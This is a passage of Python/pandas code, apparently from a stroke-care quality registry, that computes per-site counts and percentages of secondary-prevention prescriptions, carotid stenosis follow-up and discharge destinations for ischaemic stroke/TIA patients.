# Drop the redundant columns
self.statsDf.drop(['# patients receiving Vit. K antagonist', '# patients receiving dabigatran', '# patients receiving rivaroxaban', '# patients receiving apixaban', '# patients receiving edoxaban', '# patients receiving LMWH or heparin in prophylactic dose','# patients receiving LMWH or heparin in full anticoagulant dose'], axis=1, inplace=True)
self.statsDf.fillna(0, inplace=True)
###########################################
# ANTIPLATELETS - PRESCRIBED WITHOUT AFIB #
###########################################
# IS/TIA cohort, patients with aFib/flutter not detected or not known
# (AFIB_FLUTTER values 4, 5): share of them prescribed antiplatelets
# (ANTITHROMBOTICS == 1), dead patients excluded from both sides.
afib_flutter_not_detected_or_not_known = is_tia[is_tia['AFIB_FLUTTER'].isin([4, 5])].copy()
self.statsDf['afib_flutter_not_detected_or_not_known_patients'] = self._count_patients(dataframe=afib_flutter_not_detected_or_not_known)
afib_flutter_not_detected_or_not_known_dead = afib_flutter_not_detected_or_not_known[afib_flutter_not_detected_or_not_known['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['afib_flutter_not_detected_or_not_known_dead_patients'] = self._count_patients(dataframe=afib_flutter_not_detected_or_not_known_dead)
prescribed_antiplatelets_no_afib = afib_flutter_not_detected_or_not_known[afib_flutter_not_detected_or_not_known['ANTITHROMBOTICS'].isin([1])].copy()
self.statsDf['prescribed_antiplatelets_no_afib_patients'] = self._count_patients(dataframe=prescribed_antiplatelets_no_afib)
prescribed_antiplatelets_no_afib_dead = prescribed_antiplatelets_no_afib[prescribed_antiplatelets_no_afib['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['prescribed_antiplatelets_no_afib_dead_patients'] = self._count_patients(dataframe=prescribed_antiplatelets_no_afib_dead)
self.tmp = afib_flutter_not_detected_or_not_known.groupby(['Protocol ID', 'ANTITHROMBOTICS']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=1, new_column_name='# patients prescribed antiplatelets without aFib')
# Numerator: prescribed minus prescribed-and-dead; denominator: cohort minus dead.
self.statsDf['% patients prescribed antiplatelets without aFib'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed antiplatelets without aFib'] - x['prescribed_antiplatelets_no_afib_dead_patients'])/(x['afib_flutter_not_detected_or_not_known_patients'] - x['afib_flutter_not_detected_or_not_known_dead_patients'])) * 100, 2) if ((x['afib_flutter_not_detected_or_not_known_patients'] - x['afib_flutter_not_detected_or_not_known_dead_patients']) > 0) else 0, axis=1)
del afib_flutter_not_detected_or_not_known, afib_flutter_not_detected_or_not_known_dead, prescribed_antiplatelets_no_afib, prescribed_antiplatelets_no_afib_dead
#########################################
# ANTICOAGULANTS - PRESCRIBED WITH AFIB #
#########################################
# IS/TIA cohort, patients with detected aFib/flutter (AFIB_FLUTTER 1-3):
# anticoagulant prescription broken down by drug class. "Anticoagulants"
# here means any antithrombotic that is not antiplatelets (1), not
# "recommended only" (9) and not "none" (10); dead patients excluded.
# (Section continues beyond this excerpt.)
afib_flutter_detected = is_tia[is_tia['AFIB_FLUTTER'].isin([1, 2, 3])].copy()
self.statsDf['afib_flutter_detected_patients'] = self._count_patients(dataframe=afib_flutter_detected)
afib_flutter_detected_not_dead = afib_flutter_detected[~afib_flutter_detected['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['afib_flutter_detected_patients_not_dead'] = self._count_patients(dataframe=afib_flutter_detected_not_dead)
del afib_flutter_detected_not_dead
anticoagulants_prescribed = afib_flutter_detected[
~afib_flutter_detected['ANTITHROMBOTICS'].isin([1, 10, 9]) &
~afib_flutter_detected['DISCHARGE_DESTINATION'].isin([5])
].copy()
self.statsDf['# patients prescribed anticoagulants with aFib'] = self._count_patients(dataframe=anticoagulants_prescribed)
self.tmp = anticoagulants_prescribed.groupby(['Protocol ID', 'ANTITHROMBOTICS']).size().to_frame('count').reset_index()
# Additional calculation
# Per-drug percentages use alive detected-aFib patients as denominator.
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=2, new_column_name='# patients receiving Vit. K antagonist')
# self.statsDf['% patients receiving Vit. K antagonist'] = self.statsDf.apply(lambda x: round(((x['# patients receiving Vit. K antagonist']/x['# patients prescribed anticoagulants with aFib']) * 100), 2) if x['# patients prescribed anticoagulants with aFib'] > 0 else 0, axis=1)
self.statsDf['% patients receiving Vit. K antagonist'] = self.statsDf.apply(lambda x: round(((x['# patients receiving Vit. K antagonist']/x['afib_flutter_detected_patients_not_dead']) * 100), 2) if x['afib_flutter_detected_patients_not_dead'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=3, new_column_name='# patients receiving dabigatran')
self.statsDf['% patients receiving dabigatran'] = self.statsDf.apply(lambda x: round(((x['# patients receiving dabigatran']/x['afib_flutter_detected_patients_not_dead']) * 100), 2) if x['afib_flutter_detected_patients_not_dead'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=4, new_column_name='# patients receiving rivaroxaban')
self.statsDf['% patients receiving rivaroxaban'] = self.statsDf.apply(lambda x: round(((x['# patients receiving rivaroxaban']/x['afib_flutter_detected_patients_not_dead']) * 100), 2) if x['afib_flutter_detected_patients_not_dead'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=5, new_column_name='# patients receiving apixaban')
self.statsDf['% patients receiving apixaban'] = self.statsDf.apply(lambda x: round(((x['# patients receiving apixaban']/x['afib_flutter_detected_patients_not_dead']) * 100), 2) if x['afib_flutter_detected_patients_not_dead'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=6, new_column_name='# patients receiving edoxaban')
self.statsDf['% patients receiving edoxaban'] = self.statsDf.apply(lambda x: round(((x['# patients receiving edoxaban']/x['afib_flutter_detected_patients_not_dead']) * 100), 2) if x['afib_flutter_detected_patients_not_dead'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=7, new_column_name='# patients receiving LMWH or heparin in prophylactic dose')
self.statsDf['% patients receiving LMWH or heparin in prophylactic dose'] = self.statsDf.apply(lambda x: round(((x['# patients receiving LMWH or heparin in prophylactic dose']/x['afib_flutter_detected_patients_not_dead']) * 100), 2) if x['afib_flutter_detected_patients_not_dead'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=8, new_column_name='# patients receiving LMWH or heparin in full anticoagulant dose')
self.statsDf['% patients receiving LMWH or heparin in full anticoagulant dose'] = self.statsDf.apply(lambda x: round(((x['# patients receiving LMWH or heparin in full anticoagulant dose']/x['afib_flutter_detected_patients_not_dead']) * 100), 2) if x['afib_flutter_detected_patients_not_dead'] > 0 else 0, axis=1)
anticoagulants_recommended = afib_flutter_detected[afib_flutter_detected['ANTITHROMBOTICS'].isin([9])].copy()
self.statsDf['anticoagulants_recommended_patients'] = self._count_patients(dataframe=anticoagulants_recommended)
afib_flutter_detected_dead = afib_flutter_detected[afib_flutter_detected['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['afib_flutter_detected_dead_patients'] = self._count_patients(dataframe=afib_flutter_detected_dead)
self.statsDf['% patients prescribed anticoagulants with aFib'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed anticoagulants with aFib']/(x['afib_flutter_detected_patients'] - x['afib_flutter_detected_dead_patients'])) * 100), 2) if (x['afib_flutter_detected_patients'] - x['afib_flutter_detected_dead_patients']) > 0 else 0, axis=1)
##########################################
# ANTITHROMBOTICS - PRESCRIBED WITH AFIB #
##########################################
antithrombotics_prescribed = afib_flutter_detected[~afib_flutter_detected['ANTITHROMBOTICS'].isin([9, 10]) & ~afib_flutter_detected['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['# patients prescribed antithrombotics with aFib'] = self._count_patients(dataframe=antithrombotics_prescribed)
del antithrombotics_prescribed
recommended_antithrombotics_with_afib_alive = afib_flutter_detected[afib_flutter_detected['ANTITHROMBOTICS'].isin([9]) & ~afib_flutter_detected['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['recommended_antithrombotics_with_afib_alive_patients'] = self._count_patients(dataframe=recommended_antithrombotics_with_afib_alive)
del recommended_antithrombotics_with_afib_alive
self.statsDf['% patients prescribed antithrombotics with aFib'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed antithrombotics with aFib']/(x['afib_flutter_detected_patients'] - x['afib_flutter_detected_dead_patients'] - x['recommended_antithrombotics_with_afib_alive_patients'])) * 100), 2) if (x['afib_flutter_detected_patients'] - x['afib_flutter_detected_dead_patients'] - x['recommended_antithrombotics_with_afib_alive_patients']) > 0 else 0, axis=1)
##########################################
# ANTITHROMBOTICS - PRESCRIBED WITH AFIB #
##########################################
# Antithrombotics prescribed: exclude code 9 (recommended only) and 10,
# and patients discharged dead (DISCHARGE_DESTINATION == 5).
antithrombotics_prescribed = afib_flutter_detected[~afib_flutter_detected['ANTITHROMBOTICS'].isin([9, 10]) & ~afib_flutter_detected['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['# patients prescribed antithrombotics with aFib'] = self._count_patients(dataframe=antithrombotics_prescribed)
del antithrombotics_prescribed
# Patients alive with antithrombotics only recommended (code 9); they are
# removed from the percentage denominator below.
recommended_antithrombotics_with_afib_alive = afib_flutter_detected[afib_flutter_detected['ANTITHROMBOTICS'].isin([9]) & ~afib_flutter_detected['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['recommended_antithrombotics_with_afib_alive_patients'] = self._count_patients(dataframe=recommended_antithrombotics_with_afib_alive)
del recommended_antithrombotics_with_afib_alive
self.statsDf['% patients prescribed antithrombotics with aFib'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed antithrombotics with aFib']/(x['afib_flutter_detected_patients'] - x['afib_flutter_detected_dead_patients'] - x['recommended_antithrombotics_with_afib_alive_patients'])) * 100), 2) if (x['afib_flutter_detected_patients'] - x['afib_flutter_detected_dead_patients'] - x['recommended_antithrombotics_with_afib_alive_patients']) > 0 else 0, axis=1)
###########
# STATINS #
###########
# For CZ only patients discharged home included
if country_code == 'CZ':
    # CZ: statin counts/percentages over IS/TIA patients discharged home
    # (DISCHARGE_DESTINATION == 1, see '# discharge destination - Home' below).
    is_tia_discharged_home = is_tia[is_tia['DISCHARGE_DESTINATION'].isin([1])].copy()
    self.statsDf['is_tia_discharged_home_patients'] = self._count_patients(dataframe=is_tia_discharged_home)
    self.tmp = is_tia_discharged_home.groupby(['Protocol ID', 'STATIN']).size().to_frame('count').reset_index()
    del is_tia_discharged_home
    self.statsDf = self._get_values_for_factors(column_name="STATIN", value=1, new_column_name='# patients prescribed statins - Yes')
    self.statsDf['% patients prescribed statins - Yes'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed statins - Yes']/x['is_tia_discharged_home_patients']) * 100), 2) if x['is_tia_discharged_home_patients'] > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="STATIN", value=2, new_column_name='# patients prescribed statins - No')
    self.statsDf['% patients prescribed statins - No'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed statins - No']/x['is_tia_discharged_home_patients']) * 100), 2) if x['is_tia_discharged_home_patients'] > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="STATIN", value=3, new_column_name='# patients prescribed statins - Not known')
    self.statsDf['% patients prescribed statins - Not known'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed statins - Not known']/x['is_tia_discharged_home_patients']) * 100), 2) if x['is_tia_discharged_home_patients'] > 0 else 0, axis=1)
else:
    # Other countries: denominator is all IS/TIA patients.
    self.tmp = is_tia.groupby(['Protocol ID', 'STATIN']).size().to_frame('count').reset_index()
    self.statsDf = self._get_values_for_factors(column_name="STATIN", value=1, new_column_name='# patients prescribed statins - Yes')
    self.statsDf['% patients prescribed statins - Yes'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed statins - Yes']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="STATIN", value=2, new_column_name='# patients prescribed statins - No')
    self.statsDf['% patients prescribed statins - No'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed statins - No']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="STATIN", value=3, new_column_name='# patients prescribed statins - Not known')
    self.statsDf['% patients prescribed statins - Not known'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed statins - Not known']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
####################
# CAROTID STENOSIS #
####################
# Carotid stenosis categories over all IS/TIA patients.
self.tmp = is_tia.groupby(['Protocol ID', 'CAROTID_STENOSIS']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="CAROTID_STENOSIS", value=1, new_column_name='# carotid stenosis - 50%-70%')
self.statsDf['% carotid stenosis - 50%-70%'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis - 50%-70%']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_STENOSIS", value=2, new_column_name='# carotid stenosis - >70%')
self.statsDf['% carotid stenosis - >70%'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis - >70%']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_STENOSIS", value=3, new_column_name='# carotid stenosis - No')
self.statsDf['% carotid stenosis - No'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis - No']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_STENOSIS", value=4, new_column_name='# carotid stenosis - Not known')
self.statsDf['% carotid stenosis - Not known'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis - Not known']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
# Create a new column to be used in the graph for carotid stenosis. We were including just over 70% and we need to replace this by carotid stenosis > 50%
self.statsDf['# carotid stenosis - >50%'] = self.statsDf['# carotid stenosis - 50%-70%'] + self.statsDf['# carotid stenosis - >70%']
self.statsDf['% carotid stenosis - >50%'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis - >50%']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
##############################
# CAROTID STENOSIS FOLLOW-UP #
##############################
# Create temporary dataframe if carotid stenosis was 50-70% or > 70%
# NOTE(review): this filter has no .copy() unlike the surrounding subsets —
# harmless while it is only read, but inconsistent with the file's convention.
carotid_stenosis = is_tia[is_tia['CAROTID_STENOSIS'].isin([1, 2])]
self.tmp = carotid_stenosis.groupby(['Protocol ID', 'CAROTID_STENOSIS_FOLLOWUP']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="CAROTID_STENOSIS_FOLLOWUP", value=1, new_column_name='# carotid stenosis followup - Yes')
self.statsDf['% carotid stenosis followup - Yes'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis followup - Yes']/x['# carotid stenosis - >50%']) * 100), 2) if x['# carotid stenosis - >50%'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_STENOSIS_FOLLOWUP", value=2, new_column_name='# carotid stenosis followup - No')
self.statsDf['% carotid stenosis followup - No'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis followup - No']/x['# carotid stenosis - >50%']) * 100), 2) if x['# carotid stenosis - >50%'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_STENOSIS_FOLLOWUP", value=3, new_column_name='# carotid stenosis followup - No, but planned later')
self.statsDf['% carotid stenosis followup - No, but planned later'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis followup - No, but planned later']/x['# carotid stenosis - >50%']) * 100), 2) if x['# carotid stenosis - >50%'] > 0 else 0, axis=1)
# Create temporary dataframe if carotid stenosis was followed up or planned to follow up later
# (CAROTID_STENOSIS_FOLLOWUP in {1, 3} = "Yes" or "No, but planned later").
carotid_stenosis_followup = carotid_stenosis[carotid_stenosis['CAROTID_STENOSIS_FOLLOWUP'].isin([1, 3])].copy()
self.statsDf['# carotid stenosis followup - Yes, but planned'] = self._count_patients(dataframe=carotid_stenosis_followup)
self.statsDf['% carotid stenosis followup - Yes, but planned'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis followup - Yes, but planned']/x['# carotid stenosis - >50%']) * 100), 2) if x['# carotid stenosis - >50%'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_STENOSIS_FOLLOWUP", value=4, new_column_name='# carotid stenosis followup - Referred to another centre')
self.statsDf['% carotid stenosis followup - Referred to another centre'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis followup - Referred to another centre']/x['# carotid stenosis - >50%']) * 100), 2) if x['# carotid stenosis - >50%'] > 0 else 0, axis=1)
del carotid_stenosis, carotid_stenosis_followup
#####################
# ANTIHYPERTENSIVES #
#####################
# tag::antihypertensive[]
if country_code == 'CZ':
    # Filter out patients with recanalization procedures 5, 6 or 8 entered on
    # form CZ_4 (antihypertensive is not shown in the new form version).
    discharge_subset_alive_not_returned_back = discharge_subset_alive.loc[~(discharge_subset_alive['crf_parent_name'].isin(['F_RESQ_IVT_TBY_CZ_4']) & discharge_subset_alive['RECANALIZATION_PROCEDURES'].isin([5,6,8]))].copy()
    self.statsDf['discharge_subset_alive_not_returned_back_patients'] = self._count_patients(dataframe=discharge_subset_alive_not_returned_back)
    self.tmp = discharge_subset_alive_not_returned_back.groupby(['Protocol ID', 'ANTIHYPERTENSIVE']).size().to_frame('count').reset_index()
    # "Not known" (value 3) is computed first because it is subtracted from the
    # denominator of the Yes/No percentages below.
    self.statsDf = self._get_values_for_factors(column_name="ANTIHYPERTENSIVE", value=3, new_column_name='# prescribed antihypertensives - Not known')
    self.statsDf['% prescribed antihypertensives - Not known'] = self.statsDf.apply(lambda x: round(((x['# prescribed antihypertensives - Not known']/x['discharge_subset_alive_not_returned_back_patients']) * 100), 2) if x['discharge_subset_alive_not_returned_back_patients'] > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="ANTIHYPERTENSIVE", value=1, new_column_name='# prescribed antihypertensives - Yes')
    self.statsDf['% prescribed antihypertensives - Yes'] = self.statsDf.apply(lambda x: round(((x['# prescribed antihypertensives - Yes']/(x['discharge_subset_alive_not_returned_back_patients'] - x['# prescribed antihypertensives - Not known'])) * 100), 2) if (x['discharge_subset_alive_not_returned_back_patients'] - x['# prescribed antihypertensives - Not known']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="ANTIHYPERTENSIVE", value=2, new_column_name='# prescribed antihypertensives - No')
    self.statsDf['% prescribed antihypertensives - No'] = self.statsDf.apply(lambda x: round(((x['# prescribed antihypertensives - No']/(x['discharge_subset_alive_not_returned_back_patients'] - x['# prescribed antihypertensives - Not known'])) * 100), 2) if (x['discharge_subset_alive_not_returned_back_patients'] - x['# prescribed antihypertensives - Not known']) > 0 else 0, axis=1)
else:
    # Other countries: denominator is all alive discharged patients.
    self.tmp = discharge_subset_alive.groupby(['Protocol ID', 'ANTIHYPERTENSIVE']).size().to_frame('count').reset_index()
    self.statsDf = self._get_values_for_factors(column_name="ANTIHYPERTENSIVE", value=3, new_column_name='# prescribed antihypertensives - Not known')
    self.statsDf['% prescribed antihypertensives - Not known'] = self.statsDf.apply(lambda x: round(((x['# prescribed antihypertensives - Not known']/x['discharge_subset_alive_patients']) * 100), 2) if x['discharge_subset_alive_patients'] > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="ANTIHYPERTENSIVE", value=1, new_column_name='# prescribed antihypertensives - Yes')
    self.statsDf['% prescribed antihypertensives - Yes'] = self.statsDf.apply(lambda x: round(((x['# prescribed antihypertensives - Yes']/(x['discharge_subset_alive_patients'] - x['# prescribed antihypertensives - Not known'])) * 100), 2) if (x['discharge_subset_alive_patients'] - x['# prescribed antihypertensives - Not known']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="ANTIHYPERTENSIVE", value=2, new_column_name='# prescribed antihypertensives - No')
    self.statsDf['% prescribed antihypertensives - No'] = self.statsDf.apply(lambda x: round(((x['# prescribed antihypertensives - No']/(x['discharge_subset_alive_patients'] - x['# prescribed antihypertensives - Not known'])) * 100), 2) if (x['discharge_subset_alive_patients'] - x['# prescribed antihypertensives - Not known']) > 0 else 0, axis=1)
# end::antihypertensive[]
#####################
# SMOKING CESSATION #
#####################
# tag::smoking[]
if country_code == 'CZ':
    # CZ uses the filtered subset created in the antihypertensive section above.
    self.tmp = discharge_subset_alive_not_returned_back.groupby(['Protocol ID', 'SMOKING_CESSATION']).size().to_frame('count').reset_index()
    self.statsDf = self._get_values_for_factors(column_name="SMOKING_CESSATION", value=3, new_column_name='# recommended to a smoking cessation program - not a smoker')
    self.statsDf['% recommended to a smoking cessation program - not a smoker'] = self.statsDf.apply(lambda x: round(((x['# recommended to a smoking cessation program - not a smoker']/x['discharge_subset_alive_not_returned_back_patients']) * 100), 2) if x['discharge_subset_alive_not_returned_back_patients'] > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="SMOKING_CESSATION", value=1, new_column_name='# recommended to a smoking cessation program - Yes')
    self.statsDf['% recommended to a smoking cessation program - Yes'] = self.statsDf.apply(lambda x: round(((x['# recommended to a smoking cessation program - Yes']/x['discharge_subset_alive_not_returned_back_patients']) * 100), 2) if x['discharge_subset_alive_not_returned_back_patients'] > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="SMOKING_CESSATION", value=2, new_column_name='# recommended to a smoking cessation program - No')
    self.statsDf['% recommended to a smoking cessation program - No'] = self.statsDf.apply(lambda x: round(((x['# recommended to a smoking cessation program - No']/x['discharge_subset_alive_not_returned_back_patients']) * 100), 2) if x['discharge_subset_alive_not_returned_back_patients'] > 0 else 0, axis=1)
else:
    # Other countries: denominator is all alive discharged patients.
    self.tmp = discharge_subset_alive.groupby(['Protocol ID', 'SMOKING_CESSATION']).size().to_frame('count').reset_index()
    self.statsDf = self._get_values_for_factors(column_name="SMOKING_CESSATION", value=3, new_column_name='# recommended to a smoking cessation program - not a smoker')
    self.statsDf['% recommended to a smoking cessation program - not a smoker'] = self.statsDf.apply(lambda x: round(((x['# recommended to a smoking cessation program - not a smoker']/x['discharge_subset_alive_patients']) * 100), 2) if x['discharge_subset_alive_patients'] > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="SMOKING_CESSATION", value=1, new_column_name='# recommended to a smoking cessation program - Yes')
    self.statsDf['% recommended to a smoking cessation program - Yes'] = self.statsDf.apply(lambda x: round(((x['# recommended to a smoking cessation program - Yes']/x['discharge_subset_alive_patients']) * 100), 2) if x['discharge_subset_alive_patients'] > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="SMOKING_CESSATION", value=2, new_column_name='# recommended to a smoking cessation program - No')
    self.statsDf['% recommended to a smoking cessation program - No'] = self.statsDf.apply(lambda x: round(((x['# recommended to a smoking cessation program - No']/x['discharge_subset_alive_patients']) * 100), 2) if x['discharge_subset_alive_patients'] > 0 else 0, axis=1)
# end::smoking[]
##########################
# CEREBROVASCULAR EXPERT #
##########################
# tag::cerebrovascular_expert[]
if country_code == 'CZ':
    self.tmp = discharge_subset_alive_not_returned_back.groupby(['Protocol ID', 'CEREBROVASCULAR_EXPERT']).size().to_frame('count').reset_index()
    # Calculate the number of patients entered on the old form (sentinel value
    # -999); they are excluded from all percentage denominators below.
    self.statsDf = self._get_values_for_factors(column_name="CEREBROVASCULAR_EXPERT", value=-999, new_column_name='tmp')
    self.statsDf = self._get_values_for_factors(column_name="CEREBROVASCULAR_EXPERT", value=1, new_column_name='# recommended to a cerebrovascular expert - Recommended, and appointment was made')
    self.statsDf['% recommended to a cerebrovascular expert - Recommended, and appointment was made'] = self.statsDf.apply(lambda x: round(((x['# recommended to a cerebrovascular expert - Recommended, and appointment was made']/(x['discharge_subset_alive_not_returned_back_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_alive_not_returned_back_patients'] - x['tmp']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="CEREBROVASCULAR_EXPERT", value=2, new_column_name='# recommended to a cerebrovascular expert - Recommended, but appointment was not made')
    self.statsDf['% recommended to a cerebrovascular expert - Recommended, but appointment was not made'] = self.statsDf.apply(lambda x: round(((x['# recommended to a cerebrovascular expert - Recommended, but appointment was not made']/(x['discharge_subset_alive_not_returned_back_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_alive_not_returned_back_patients'] - x['tmp']) > 0 else 0, axis=1)
    # Combined "Recommended" = appointment made + appointment not made.
    self.statsDf.loc[:, '# recommended to a cerebrovascular expert - Recommended'] = self.statsDf.apply(lambda x: x['# recommended to a cerebrovascular expert - Recommended, and appointment was made'] + x['# recommended to a cerebrovascular expert - Recommended, but appointment was not made'], axis=1)
    self.statsDf['% recommended to a cerebrovascular expert - Recommended'] = self.statsDf.apply(lambda x: round(((x['# recommended to a cerebrovascular expert - Recommended']/(x['discharge_subset_alive_not_returned_back_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_alive_not_returned_back_patients'] - x['tmp']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="CEREBROVASCULAR_EXPERT", value=3, new_column_name='# recommended to a cerebrovascular expert - Not recommended')
    self.statsDf['% recommended to a cerebrovascular expert - Not recommended'] = self.statsDf.apply(lambda x: round(((x['# recommended to a cerebrovascular expert - Not recommended']/(x['discharge_subset_alive_not_returned_back_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_alive_not_returned_back_patients'] - x['tmp']) > 0 else 0, axis=1)
    self.statsDf.drop(['tmp'], inplace=True, axis=1)
else:
    self.tmp = discharge_subset_alive.groupby(['Protocol ID', 'CEREBROVASCULAR_EXPERT']).size().to_frame('count').reset_index()
    # Calculate the number of patients entered on the old form (sentinel -999).
    self.statsDf = self._get_values_for_factors(column_name="CEREBROVASCULAR_EXPERT", value=-999, new_column_name='tmp')
    self.statsDf = self._get_values_for_factors(column_name="CEREBROVASCULAR_EXPERT", value=1, new_column_name='# recommended to a cerebrovascular expert - Recommended, and appointment was made')
    self.statsDf['% recommended to a cerebrovascular expert - Recommended, and appointment was made'] = self.statsDf.apply(lambda x: round(((x['# recommended to a cerebrovascular expert - Recommended, and appointment was made']/(x['discharge_subset_alive_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_alive_patients'] - x['tmp']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="CEREBROVASCULAR_EXPERT", value=2, new_column_name='# recommended to a cerebrovascular expert - Recommended, but appointment was not made')
    self.statsDf['% recommended to a cerebrovascular expert - Recommended, but appointment was not made'] = self.statsDf.apply(lambda x: round(((x['# recommended to a cerebrovascular expert - Recommended, but appointment was not made']/(x['discharge_subset_alive_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_alive_patients'] - x['tmp']) > 0 else 0, axis=1)
    self.statsDf.loc[:, '# recommended to a cerebrovascular expert - Recommended'] = self.statsDf.apply(lambda x: x['# recommended to a cerebrovascular expert - Recommended, and appointment was made'] + x['# recommended to a cerebrovascular expert - Recommended, but appointment was not made'], axis=1)
    self.statsDf['% recommended to a cerebrovascular expert - Recommended'] = self.statsDf.apply(lambda x: round(((x['# recommended to a cerebrovascular expert - Recommended']/(x['discharge_subset_alive_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_alive_patients'] - x['tmp']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="CEREBROVASCULAR_EXPERT", value=3, new_column_name='# recommended to a cerebrovascular expert - Not recommended')
    self.statsDf['% recommended to a cerebrovascular expert - Not recommended'] = self.statsDf.apply(lambda x: round(((x['# recommended to a cerebrovascular expert - Not recommended']/(x['discharge_subset_alive_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_alive_patients'] - x['tmp']) > 0 else 0, axis=1)
    self.statsDf.drop(['tmp'], inplace=True, axis=1)
# end::cerebrovascular_expert[]
#########################
# DISCHARGE DESTINATION #
#########################
# Tabulate DISCHARGE_DESTINATION per site, then derive a count column and a
# percentage column for each destination code; the percentage denominator is
# 'discharge_subset_patients'.
self.tmp = discharge_subset.groupby(['Protocol ID', 'DISCHARGE_DESTINATION']).size().to_frame('count').reset_index()
destination_labels = (
    (1, 'Home'),
    (2, 'Transferred within the same centre'),
    (3, 'Transferred to another centre'),
    (4, 'Social care facility'),
    (5, 'Dead'),
)
for destination_code, destination_label in destination_labels:
    count_column = '# discharge destination - ' + destination_label
    percent_column = '% discharge destination - ' + destination_label
    self.statsDf = self._get_values_for_factors(column_name="DISCHARGE_DESTINATION", value=destination_code, new_column_name=count_column)
    # Bind count_column as a default argument to avoid the late-binding
    # closure pitfall inside the loop.
    self.statsDf[percent_column] = self.statsDf.apply(
        lambda row, count_column=count_column: round((row[count_column] / row['discharge_subset_patients']) * 100, 2) if row['discharge_subset_patients'] > 0 else 0,
        axis=1)
#######################################
# DISCHARGE DESTINATION - SAME CENTRE #
#######################################
# Breakdown of patients transferred within the same centre (destination code 2)
# by DISCHARGE_SAME_FACILITY; percentages use the same-centre patient count.
discharge_subset_same_centre = discharge_subset[discharge_subset['DISCHARGE_DESTINATION'].isin([2])].copy()
self.statsDf['discharge_subset_same_centre_patients'] = self._count_patients(dataframe=discharge_subset_same_centre)
